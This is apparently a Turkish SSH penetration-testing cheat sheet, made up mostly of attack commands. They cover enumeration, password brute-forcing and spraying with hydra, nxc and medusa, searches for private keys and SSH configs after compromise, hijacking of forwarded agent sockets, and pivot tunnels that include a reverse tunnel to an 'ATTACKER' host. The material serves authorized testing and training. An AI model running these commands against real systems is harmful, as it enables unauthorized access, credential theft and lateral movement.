SSH Pentesting
SSH difficulty: kolay-orta
SSH çoğu ortamda yönetim düzlemidir: zayıf parola, yeniden kullanılan anahtar, eski algoritma ve agent forwarding yanlışları shell’e giden kısa yoldur.
Ön koşullar
Section titled “Ön koşullar”- Hedef IP / hostname, opsiyonel kullanıcı listesi- Araçlar: nmap, ssh-audit, hydra/nxc, ssh-keygen, sshMetodoloji
Section titled “Metodoloji”-
Banner / sürüm ve desteklenen auth yöntemlerini çıkar.
-
Zayıf cipher/KEX/hostkey ve user enum ipuçlarını not et.
-
Anahtar veya parola ile erişim dene (spray politikasına uy).
-
İçeride agent, config, authorized_keys ve lateral tünelleri kontrol et.
Enumeration
Section titled “Enumeration”nmap -p22 -sV --script ssh2-enum-algos,ssh-auth-methods,ssh-hostkey 10.10.10.5ssh-audit 10.10.10.5ssh -v -o PreferredAuthentications=none -o NumberOfPasswordPrompts=0 user@10.10.10.5nc -nv 10.10.10.5 22nmap -p22 --script ssh-auth-methods --script-args="ssh.user=root" 10.10.10.5Kimlik saldırıları
Section titled “Kimlik saldırıları”hydra -L users.txt -P pass.txt ssh://10.10.10.5 -t 4nxc ssh 10.10.10.5 -u users.txt -p 'Sonbahar2025!' --continue-on-successmedusa -h 10.10.10.5 -U users.txt -P pass.txt -M ssh# bilinen private key ilessh -i id_rsa user@10.10.10.5chmod 600 id_rsassh-keygen -y -f id_rsaParola sprey disiplinleri: Password Attacks.
Anahtar ve config bulma (loot sonrası)
Section titled “Anahtar ve config bulma (loot sonrası)”find /home /root -name id_rsa -o -name id_ed25519 -o -name authorized_keys 2>/dev/nullcat ~/.ssh/configcat ~/.ssh/known_hostsgrep -R "BEGIN OPENSSH PRIVATE KEY" /var/www /opt 2>/dev/nullAgent forwarding suistimali
Section titled “Agent forwarding suistimali”ForwardAgent yes ile bağlanmış oturumda kurbanın agent soketine erişilebilir:
echo "$SSH_AUTH_SOCK"ssh-add -lssh -A user@10.10.10.5# ele geçirilen sock üzerinden başka hostaSSH_AUTH_SOCK=/tmp/ssh-XXX/agent.YYY ssh user@internalTünel (pivot)
Section titled “Tünel (pivot)”ssh -L 8080:127.0.0.1:80 user@10.10.10.5ssh -R 9050:127.0.0.1:9050 user@ATTACKERssh -D 1080 user@10.10.10.5ssh -J jumpuser@bastion user@internalDaha geniş tünel repertuvarı: Pivoting.
Komut üreteci
Section titled “Komut üreteci”ssh-audit
embedded toolGenerated command
ssh-audit 10.10.10.5ssh-audit
Section titled “ssh-audit”Dikkat edilecekler
Section titled “Dikkat edilecekler”- Eski OpenSSH / libssh CVE’leri (sürüme göre)- root login + PasswordAuthentication yes- Aynı anahtarın birçok sunucuda yeniden kullanımı- debian weak keys / düşük entropy (eski cihazlar)Zincir
Section titled “Zincir”ssh-audit → zayıf auth → spray veya bulunan id_rsa → SSH -D / -J → iç ağ nmap